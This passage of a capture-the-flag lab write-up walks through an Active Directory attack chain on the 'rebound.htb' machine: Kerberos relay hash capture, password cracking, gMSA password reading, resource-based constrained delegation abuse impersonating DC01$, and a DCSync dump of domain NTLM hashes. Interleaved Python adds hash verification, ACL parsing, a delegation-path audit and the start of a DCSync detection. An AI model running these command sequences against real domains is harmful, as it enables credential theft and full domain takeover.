objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAVsUCr04tcydvgMs0OOy2gAjgAAFwU//+RK118th5j0yIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing cross-session authentication
[*] Using CLSID: 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4
[*] Spawning in session 1
[*] NTLM1
4e544c4d535350000100000097b218e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44
[*] NTLM2
4e544c4d53535000020000000e000e003800000015c299e24e2e40c1e1bd1ec6000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800702fb5405a44db01000000000000000000000000ccccccccf00000000000000000000200011008000bcccccc
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection, AllowNonUserLogons
[*] NTLM3
tbrady::rebound:4e2e40c1e1bd1ec6:e8154c8f3d480022ef5ee7f05dc4ff68:0101000000000000702fb5405a44db01d0673f6303990f8f0000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800702fb5405a44db010600040006000000080030003000000000000000010000000020000022fd9fca22a545b94dc14a4bbbace7f47bb7d8671975bf45c0fc3c4a2ebba45c0a00100000000000000000000000000000000000090000000000000000000000
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
at KrbRelay.IStandardActivator.StandardGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsidOverride, IntPtr punkOuter, CLSCTX dwClsCtx, IStorage pstg, Int32 dwCount, MULTI_QI[] pResults)
at KrbRelay.Program.Main(String[] args)
The E_ACCESSDENIED at the end is the COM activation call failing after the authentication already completed, which doesn't matter: the NTLM3 line is a complete NetNTLMv2 challenge/response for tbrady in john/hashcat format.
-l 9 means logon type 9 (NewCredentials), i.e. run a command simulating the /netonly flag of runas.exe (per the RunasCs usage text). I think we don't need to provide real credentials and the uwu word is just filler for RunasCs to work properly; it's going to spawn the process locally and that's fine for us.
Crack the password
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
543BOMBOMBUNmanda (tbrady)
1g 0:00:00:05 DONE (2024-12-01 22:36) 0.1697g/s 2068Kp/s 2068Kc/s 2068KC/s 5462607..543584
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Creds:
tbrady:543BOMBOMBUNmanda
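Added example (not from the writeup, KrbRelay or john): checking the crack offline. The NTLM3 line KrbRelay printed is a complete NetNTLMv2 challenge/response, so the cracked password can be confirmed by recomputing NTProofStr the way john's netntlmv2 format does (NT hash = MD4 of the UTF-16LE password, NTOWFv2 = HMAC-MD5 of uppercase user + domain under that hash, NTProofStr = HMAC-MD5 of server challenge + blob under NTOWFv2), and the AV pairs the client copied into the blob can be decoded to see what the DC put into its challenge (NetBIOS and DNS names, timestamp). The two hex strings are the NTLM2 and NTLM3 lines from the page; the NTLM2 message is cut after its MsvAvEOL terminator because KrbRelay prints a few buffer bytes past the end of the message. MD4 is implemented inline because hashlib's md4 is missing on OpenSSL 3 builds without the legacy provider.

```python
import hmac
import struct
from datetime import datetime, timedelta, timezone

# From the page: KrbRelay's "NTLM2" CHALLENGE_MESSAGE, cut after the MsvAvEOL pair.
CHALLENGE_HEX = (
    "4e544c4d53535000020000000e000e003800000015c299e24e2e40c1e1bd1ec6"
    "000000000000000086008600460000000a0063450000000f7200650062006f00"
    "75006e00640002000e007200650062006f0075006e0064000100080044004300"
    "30003100040016007200650062006f0075006e0064002e006800740062000300"
    "200064006300300031002e007200650062006f0075006e0064002e0068007400"
    "6200050016007200650062006f0075006e0064002e0068007400620007000800"
    "702fb5405a44db0100000000"
)
# From the page: KrbRelay's "NTLM3" line (user::domain:ServerChallenge:NTProofStr:blob).
NTLMV2_LINE = (
    "tbrady::rebound:4e2e40c1e1bd1ec6:e8154c8f3d480022ef5ee7f05dc4ff68:"
    "0101000000000000702fb5405a44db01d0673f6303990f8f0000000002000e00"
    "7200650062006f0075006e006400010008004400430030003100040016007200"
    "650062006f0075006e0064002e00680074006200030020006400630030003100"
    "2e007200650062006f0075006e0064002e006800740062000500160072006500"
    "62006f0075006e0064002e0068007400620007000800702fb5405a44db010600"
    "040006000000080030003000000000000000010000000020000022fd9fca22a5"
    "45b94dc14a4bbbace7f47bb7d8671975bf45c0fc3c4a2ebba45c0a0010000000"
    "0000000000000000000000000000090000000000000000000000"
)
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName", 5: "DnsTreeName",
            6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is missing on OpenSSL 3 without the legacy provider)."""
    mask = 0xFFFFFFFF
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    rounds = ((f, range(16), (3, 7, 11, 19), 0),
              (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
              (lambda x, y, z: x ^ y ^ z, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1))
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, order, shifts, k in rounds:
            for i, j in enumerate(order):
                a = rot((a + func(b, c, d) + x[j] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate registers: next step updates the old d
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def filetime_to_datetime(ft: int) -> datetime:
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_av_pairs(data: bytes, offset: int = 0) -> dict:
    """AV_PAIR list ([MS-NLMP] 2.2.2.1): AvId u16, AvLen u16, value; ends at MsvAvEOL."""
    pairs = {}
    while offset + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        value, offset = data[offset + 4:offset + 4 + av_len], offset + 4 + av_len
        if av_id == 0:
            break
        if av_id in (1, 2, 3, 4, 5, 9):   # UTF-16LE names
            parsed = value.decode("utf-16-le")
        elif av_id == 7:                   # FILETIME
            parsed = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:                              # flags, single-host data, channel bindings
            parsed = value.hex()
        pairs[AV_NAMES.get(av_id, f"AvId{av_id}")] = parsed
    return pairs

def parse_challenge(hex_msg: str) -> dict:
    """Fields of an NTLMSSP CHALLENGE_MESSAGE ([MS-NLMP] 2.2.1.2)."""
    data = bytes.fromhex(hex_msg)
    if data[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", data, 8)[0] != 2:
        raise ValueError("not an NTLMSSP CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", data, 12)
    ti_len, _, ti_off = struct.unpack_from("<HHI", data, 40)
    return {"target_name": data[tn_off:tn_off + tn_len].decode("utf-16-le"),
            "server_challenge": data[24:32].hex(),
            "target_info": parse_av_pairs(data[ti_off:ti_off + ti_len])}

def parse_netntlmv2(line: str) -> dict:
    """Split a john/hashcat NetNTLMv2 line; the blob is NTLMv2_CLIENT_CHALLENGE ([MS-NLMP] 2.2.2.7)."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.split(":", 5)
    blob = bytes.fromhex(blob_hex)
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "nt_proof": nt_proof, "blob": blob,
            "timestamp": filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0]),
            "client_challenge": blob[16:24].hex(),
            "av_pairs": parse_av_pairs(blob, 28)}

def verify_netntlmv2(line: str, password: str) -> bool:
    """Recompute NTProofStr the way john does: HMAC-MD5(NTOWFv2, ServerChallenge || blob)."""
    h = parse_netntlmv2(line)
    nt_hash = md4(password.encode("utf-16-le"))                       # NTOWFv1
    identity = (h["user"].upper() + h["domain"]).encode("utf-16-le")  # user uppercased, domain as given
    ntowf_v2 = hmac.new(nt_hash, identity, "md5").digest()
    proof = hmac.new(ntowf_v2, bytes.fromhex(h["server_challenge"]) + h["blob"], "md5")
    return hmac.compare_digest(proof.hexdigest(), h["nt_proof"])
```

verify_netntlmv2(NTLMV2_LINE, "543BOMBOMBUNmanda") returns True and any other password returns False; parse_challenge(CHALLENGE_HEX)["server_challenge"] is the 4e2e40c1e1bd1ec6 in the john line, and the blob's AV pairs repeat the DC's TargetInfo (rebound, DC01, rebound.htb, dc01.rebound.htb, plus the DC's timestamp). Note that the domain is used exactly as captured, so a wrong case in that field would make a correct password fail to verify.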
GMSA (tbrady)
https://www.netexec.wiki/ldap-protocol/dump-gmsa
ReadGMSAPassword means tbrady's SID (RID 7686) is granted read access in delegator$'s msDS-GroupMSAMembership descriptor, so as tbrady we can read msDS-ManagedPassword and netexec derives the NT hash from it:
└─$ faketime -f +7h netexec ldap 10.129.229.114 -u tbrady -p '543BOMBOMBUNmanda' --gmsa -k
SMB 10.129.229.114 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.229.114 636 DC01 [+] rebound.htb\tbrady:543BOMBOMBUNmanda
LDAPS 10.129.229.114 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.229.114 636 DC01 Account: delegator$ NTLM: 4ba33add1108fe560429fc27a1bcab6b
Creds:
delegator$:4ba33add1108fe560429fc27a1bcab6b
Privilege Escalation (2)
Delegations
https://www.thehacker.recipes/ad/movement/kerberos/delegations/: Kerberos delegations allow services to access other services on behalf of domain users.
└─$ faketime -f +7h impacket-findDelegation 'REBOUND.HTB'/'tbrady':'543BOMBOMBUNmanda' -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- -------------- --------------------- ----------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb No
https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained: If a service account, configured with constrained delegation to another service, is compromised, an attacker can impersonate any user (e.g. domain admin, except users protected against delegation) in the environment to access another service the initial one can delegate to.
Administrator has NOT_DELEGATED set ("Account is sensitive and cannot be delegated"), so it is protected against this kind of impersonation: the KDC will not issue a forwardable S4U2Self ticket for it.
└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 get object administrator | grep DELEG
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD; NOT_DELEGATED
Hmmm... ChatGPT:
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd: If an account, having the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object (e.g. the GenericWrite ACE, see Abusing ACLs), is compromised, an attacker can use it to populate that attribute, hence configuring that object for RBCD.
The service account doesn't have the mentioned attribute, but I think the attack will still be valid:
└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 get object delegator$ | grep msDS
msDS-AllowedToDelegateTo: http/dc01.rebound.htb
msDS-GroupMSAMembership: O:S-1-5-32-544D:(A;;0xf01ff;;;S-1-5-21-4078382237-1492182817-2568127209-7686)
msDS-ManagedPasswordId: AQAAAEtEU0sCAAAAagEAABwAAAAGAAAAqozXLXGPzBuv4FrBregFhwAAAAAYAAAAGAAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAA==
msDS-ManagedPasswordInterval: 30
msDS-ManagedPasswordPreviousId: AQAAAEtEU0sCAAAAagEAABkAAAAeAAAAqozXLXGPzBuv4FrBregFhwAAAAAYAAAAGAAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAHIAZQBiAG8AdQBuAGQALgBoAHQAYgAAAA==
msDS-SupportedEncryptionTypes: 28
objectClass: top; person; organizationalPerson; user; computer; msDS-GroupManagedServiceAccount
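Added example (not from the writeup, bloodyAD or powerview): reading the descriptor and access masks above without tooling. msDS-GroupMSAMembership is a security descriptor, printed here as SDDL, and it is what decides who may read the gMSA's password. The parser below handles the O:/D: parts and both the hex and the two-letter rights syntax, decodes AD access masks (the 0x8 Self and 0xf01ff FullControl seen in the ACL section as well as the 0xf01ff here), and maps RIDs back to names with a table built from the rid-brute listing earlier on the page. That table and the well-known SIDs are the only inputs not copied verbatim from the page.

```python
import re

DOMAIN_SID = "S-1-5-21-4078382237-1492182817-2568127209"
# Constructed from the rid-brute listing earlier on the page (RID -> sAMAccountName).
RID_NAMES = {500: "Administrator", 1000: "DC01$", 7681: "ldap_monitor", 7682: "oorend",
             7683: "ServiceMgmt", 7684: "winrm_svc", 7686: "tbrady", 7687: "delegator$"}
WELL_KNOWN = {"S-1-5-32-544": "BUILTIN\\Administrators", "S-1-5-18": "NT AUTHORITY\\SYSTEM"}
# delegator$'s msDS-GroupMSAMembership exactly as bloodyAD printed it above.
GMSA_SDDL = "O:S-1-5-32-544D:(A;;0xf01ff;;;S-1-5-21-4078382237-1492182817-2568127209-7686)"

# Active Directory access-mask bits with their SDDL codes ([MS-DTYP] 2.4.3, [MS-ADTS] 5.1.3.2).
RIGHTS = [
    (0x00000001, "CreateChild", "CC"), (0x00000002, "DeleteChild", "DC"),
    (0x00000004, "ListChildren", "LC"), (0x00000008, "Self", "SW"),
    (0x00000010, "ReadProperty", "RP"), (0x00000020, "WriteProperty", "WP"),
    (0x00000040, "DeleteTree", "DT"), (0x00000080, "ListObject", "LO"),
    (0x00000100, "ExtendedRight", "CR"), (0x00010000, "Delete", "SD"),
    (0x00020000, "ReadControl", "RC"), (0x00040000, "WriteDacl", "WD"),
    (0x00080000, "WriteOwner", "WO"), (0x10000000, "GenericAll", "GA"),
    (0x20000000, "GenericExecute", "GX"), (0x40000000, "GenericWrite", "GW"),
    (0x80000000, "GenericRead", "GR"),
]
FULL_CONTROL = 0x000F01FF  # every object-specific + standard right: PowerView's "FullControl"
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^;)]*)\)")


def mask_from_sddl(rights: str) -> int:
    """SDDL rights field: a hex literal (0xf01ff) or concatenated two-letter codes (RPWP, GA...)."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    codes = {code: bit for bit, _, code in RIGHTS}
    return sum(codes[rights[i:i + 2]] for i in range(0, len(rights), 2))


def describe_mask(mask: int) -> list:
    """Right names in a mask; GenericAll or the complete 0xf01ff set collapse to FullControl."""
    if mask & 0x10000000 or (mask & FULL_CONTROL) == FULL_CONTROL:
        return ["FullControl"]
    return [name for bit, name, _ in RIGHTS if mask & bit]


def resolve_sid(sid: str) -> str:
    if sid in WELL_KNOWN:
        return WELL_KNOWN[sid]
    if sid.startswith(DOMAIN_SID + "-"):
        rid = int(sid.rsplit("-", 1)[1])
        return RID_NAMES.get(rid, f"rid-{rid}")
    return sid


def parse_sddl(sddl: str) -> dict:
    """Owner and DACL ACEs of an SDDL string (the group and the SACL are ignored)."""
    owner = re.match(r"O:(.+?)(?=G:|D:|S:|$)", sddl)
    dacl = re.search(r"D:(?:P|AI|AR)*((?:\([^)]*\))+)", sddl)
    ace_types = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED",
                 "OA": "ACCESS_ALLOWED_OBJECT", "OD": "ACCESS_DENIED_OBJECT"}
    aces = []
    for ace_type, flags, rights, obj, inh_obj, trustee in ACE_RE.findall(dacl.group(1) if dacl else ""):
        mask = mask_from_sddl(rights)
        aces.append({"type": ace_types.get(ace_type, ace_type), "inherit": flags, "mask": mask,
                     "rights": describe_mask(mask), "object_type": obj, "inherited_object_type": inh_obj,
                     "trustee": trustee, "trustee_name": resolve_sid(trustee)})
    return {"owner": owner.group(1) if owner else None,
            "owner_name": resolve_sid(owner.group(1)) if owner else None, "aces": aces}


def who_can_read_gmsa(msa_membership_sddl: str) -> list:
    """Trustees allowed to read msDS-ManagedPassword: allow ACEs with ReadProperty, GenericRead or GenericAll."""
    readable = 0x10 | 0x80000000 | 0x10000000
    return [ace["trustee_name"] for ace in parse_sddl(msa_membership_sddl)["aces"]
            if ace["type"].startswith("ACCESS_ALLOWED") and ace["mask"] & readable]
```

who_can_read_gmsa(GMSA_SDDL) returns ["tbrady"], which is the ReadGMSAPassword edge BloodHound drew; describe_mask(0x8) gives ["Self"] and describe_mask(0xF01FF) gives ["FullControl"], matching the two ACEs powerview printed. An empty "inherit" field on an ACE is the InheritanceType None powerview showed, so the right stops at the object it is set on.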
delegator$ is objectClass computer, and a computer account may write its own msDS-AllowedToActOnBehalfOfOtherIdentity, so with its hash we can configure RBCD on it ourselves. The account we allow to act on its behalf needs an SPN to be able to do S4U2Self, so ldap_monitor (ldapmonitor/dc01.rebound.htb) is the candidate:
└─$ faketime -f +7h impacket-rbcd 'rebound.htb/delegator$' -hashes :4ba33add1108fe560429fc27a1bcab6b -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at dc01.rebound.htb:88
[+] Trying to connect to KDC at dc01.rebound.htb:88
[+] Trying to connect to KDC at dc01.rebound.htb:88
[+] Initializing domainDumper()
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
Note: If you are getting 'invalid server address', make sure you have dc01 in /etc/hosts or in DNS... (Windows things, I guess...)
Verify that it was added:
└─$ faketime -f +7h impacket-findDelegation 'REBOUND.HTB'/'tbrady':'543BOMBOMBUNmanda' -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
------------ ----------------------------------- -------------------------- --------------------- ----------
ldap_monitor Person Resource-Based Constrained delegator$ No
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb No
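The findDelegation table is exactly the data a defender needs to spot this chain before anyone abuses it: ldap_monitor (a plain user) is trusted by delegator$ through RBCD, and delegator$ is constrained to an SPN on the DC. The Python below is an added example, not part of the writeup or of Impacket: it parses findDelegation-style output, builds a graph of delegation hops, and reports every path that ends at a domain controller. The DC hostname set and the sample table are assumptions constructed from the output above.

```python
"""Delegation-chain audit over findDelegation-style output."""
import re

# Assumption: hostnames of the domain controllers whose SPNs we care about.
DOMAIN_CONTROLLERS = {"dc01.rebound.htb"}

# Constructed sample: the header and the two data rows of the findDelegation output above.
FIND_DELEGATION_OUTPUT = """\
AccountName   AccountType                          DelegationType              DelegationRightsTo      SPN Exists
------------  -----------------------------------  --------------------------  ----------------------  ----------
ldap_monitor  Person                               Resource-Based Constrained  delegator$              No
delegator$    ms-DS-Group-Managed-Service-Account  Constrained                 http/dc01.rebound.htb   No
"""

# One table row; the header and separator lines do not match because the third
# column must be one of the delegation type strings findDelegation prints.
ROW_RE = re.compile(
    r"^(?P<account>\S+)\s+(?P<type>\S+)\s+"
    r"(?P<deleg>Unconstrained|(?:Resource-Based )?Constrained(?: w/ Protocol Transition)?)\s+"
    r"(?P<target>\S+)\s+(?P<spn>Yes|No)$"
)


def parse_find_delegation(text):
    """Parse the table into dicts with keys account, type, deleg, target, spn."""
    return [m.groupdict() for m in (ROW_RE.match(l.strip()) for l in text.splitlines()) if m]


def spn_host(spn):
    """'cifs/DC01.rebound.htb:445' -> 'dc01.rebound.htb'."""
    return spn.split("/", 1)[-1].split(":", 1)[0].lower()


def build_graph(rows):
    """account -> list of (kind, target). An RBCD row means the target *account* trusts this
    account to impersonate users to it; a constrained row targets an SPN."""
    graph = {}
    for r in rows:
        if r["deleg"] == "Unconstrained":
            kind = "unconstrained"
        elif r["deleg"].startswith("Resource-Based"):
            kind = "rbcd"
        else:
            kind = "constrained"
        graph.setdefault(r["account"], []).append((kind, r["target"]))
    return graph


def find_paths_to_dc(graph, dcs=DOMAIN_CONTROLLERS):
    """Every chain of delegation hops ending at an SPN hosted on a DC, or at an
    unconstrained-delegation account (which can reach anything its callers reach)."""
    paths = []

    def walk(node, path, seen):
        for kind, target in graph.get(node, []):
            if kind == "constrained" and spn_host(target) in dcs:
                paths.append(path + [target])
            elif kind == "unconstrained":
                paths.append(path + ["<unconstrained>"])
            elif kind == "rbcd" and target not in seen:
                walk(target, path + [target], seen | {target})

    for start in graph:
        walk(start, [start], {start})
    return paths


def risk_report(rows):
    """Rate each path: a chain that starts at a user account is worse than one that
    starts at a service/computer account, because a user password is easier to obtain."""
    types = {r["account"]: r["type"] for r in rows}
    report = []
    for path in find_paths_to_dc(build_graph(rows)):
        severity = "CRITICAL" if types.get(path[0]) == "Person" else "HIGH"
        report.append(f"{severity}: {' -> '.join(path)}")
    return report


if __name__ == "__main__":
    for line in risk_report(parse_find_delegation(FIND_DELEGATION_OUTPUT)):
        print(line)
```

On the table above this prints a CRITICAL line for ldap_monitor -> delegator$ -> http/dc01.rebound.htb and a HIGH line for delegator$ -> http/dc01.rebound.htb. Note that the "SPN Exists: No" column is not a mitigation here: by default the http service class is mapped onto the HOST SPN (the sPNMappings attribute), so the KDC still resolves http/dc01.rebound.htb to DC01$. Fixes are to remove the constrained delegation to DC SPNs, clear msDS-AllowedToActOnBehalfOfOtherIdentity on delegator$, and put DC01$ in Protected Users / mark it "sensitive and cannot be delegated" so it cannot be impersonated in the first place.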
This delegation can act on behalf of users, but not of the administrator. We can try to impersonate the DC's machine account (DC01$) itself.
└─$ faketime -f +7h impacket-getST -spn 'browser/dc01.rebound.htb' -impersonate DC01$ -dc-ip 'dc01.rebound.htb' 'REBOUND.HTB/ldap_monitor:1GR8t@$$4u'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
The ticket is forwardable and essentially acts like a Silver Ticket.
└─$ impacket-describeTicket './DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : 5be8a304b057bef209cb2b7c8b2f0f6f
[*] User Name : DC01$
[*] User Realm : REBOUND.HTB
[*] Service Name : browser/dc01.rebound.htb
[*] Service Realm : REBOUND.HTB
[*] Start Time : 01/12/2024 21:56:13 PM
[*] End Time : 02/12/2024 07:56:12 AM
[*] RenewTill : 02/12/2024 21:56:14 PM
[*] Flags : (0x40a10000) forwardable, renewable, pre_authent, enc_pa_rep
[*] KeyType : rc4_hmac
[*] Base64(key) : W+ijBLBXvvIJyyt8iy8Pbw==
[*] Kerberoast hash : $krb5tgs$18$USER$REBOUND.HTB$*browser/dc01.rebound.htb*$c740b6...03d27944393e89d2ce62c
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : browser/dc01.rebound.htb
[*] Service Realm : REBOUND.HTB
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
└─$ KRB5CCNAME='DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache' klist
Ticket cache: FILE:DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache
Default principal: DC01$@REBOUND.HTB
Valid starting Expires Service principal
12/01/2024 21:56:13 12/02/2024 07:56:12 browser/dc01.rebound.htb@REBOUND.HTB
renew until 12/02/2024 21:56:14
There's a second step to using this ticket: https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained#_2-additional-s4u2proxy
└─$ faketime -f +7h impacket-getST -spn "http/dc01.rebound.htb" -impersonate "DC01$" -additional-ticket './DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache' -hashes :4ba33add1108fe560429fc27a1bcab6b 'rebound.htb/delegator$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC01$
[*] Using additional ticket ./DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache
└─$ KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache' klist
Ticket cache: FILE:DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache
Default principal: DC01$@REBOUND.HTB
Valid starting Expires Service principal
12/01/2024 22:09:09 12/02/2024 08:09:08 http/dc01.rebound.htb@REBOUND.HTB
renew until 12/02/2024 22:09:10
└─$ KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache' faketime -f +7h impacket-secretsdump -k -no-pass dc01.rebound.htb -just-dc-ntlm
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1108b27a9ff61ed4139d1443fbcf664b:::
ppaul:1951:aad3b435b51404eeaad3b435b51404ee:7785a4172e31e908159b0904e1153ec0:::
llune:2952:aad3b435b51404eeaad3b435b51404ee:e283977e2cbffafc0d6a6bd2a50ea680:::
fflock:3382:aad3b435b51404eeaad3b435b51404ee:1fc1d0f9c5ada600903200bc308f7981:::
jjones:5277:aad3b435b51404eeaad3b435b51404ee:e1ca2a386be17d4a7f938721ece7fef7:::
mmalone:5569:aad3b435b51404eeaad3b435b51404ee:87becdfa676275415836f7e3871eefa3:::
nnoon:5680:aad3b435b51404eeaad3b435b51404ee:f9a5317b1011878fc527848b6282cd6e:::
ldap_monitor:7681:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
oorend:7682:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
winrm_svc:7684:aad3b435b51404eeaad3b435b51404ee:4469650fd892e98933b4536d2e86e512:::
batch_runner:7685:aad3b435b51404eeaad3b435b51404ee:d8a34636c7180c5851c19d3e865814e0:::
tbrady:7686:aad3b435b51404eeaad3b435b51404ee:114e76d0be2f60bd75dc160ab3607215:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:989c1783900ffcb85de8d5ca4430c70f:::
delegator$:7687:aad3b435b51404eeaad3b435b51404ee:4ba33add1108fe560429fc27a1bcab6b:::
[*] Cleaning up...
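The replication dump above is what a DCSync detection is meant to catch, but this chain has a twist: the DRSUAPI calls are made with a ticket for DC01$, so the Security log's 4662 events name a domain controller as the subject and a rule that only looks for "replication rights used by a non-DC account" stays silent. The Python below is an added example, not from the writeup: it runs two checks over constructed Security events, the usual 4662 check and a 4769 check that flags service tickets issued for a DC machine account either from a non-DC source address or through S4U2Proxy (non-empty Transited Services). The DC account/address sets and all event records are assumptions built from the values in this writeup; the replication control-access GUIDs are the well-known ones.

```python
"""Two detections for the replication step above, over constructed Security events."""
import re

DC_ACCOUNTS = {"DC01$"}                  # assumption: machine accounts of the domain controllers
DC_ADDRESSES = {"10.129.229.114"}        # assumption: their addresses (the DC IP used in this writeup)

# Well-known control-access right GUIDs that DCSync-style replication needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{?([0-9a-fA-F-]{36})\}?")

# Constructed events modelled on Security log fields; not real logs from the box.
SAMPLE_EVENTS = [
    # a plain user requesting replication: the classic DCSync indicator
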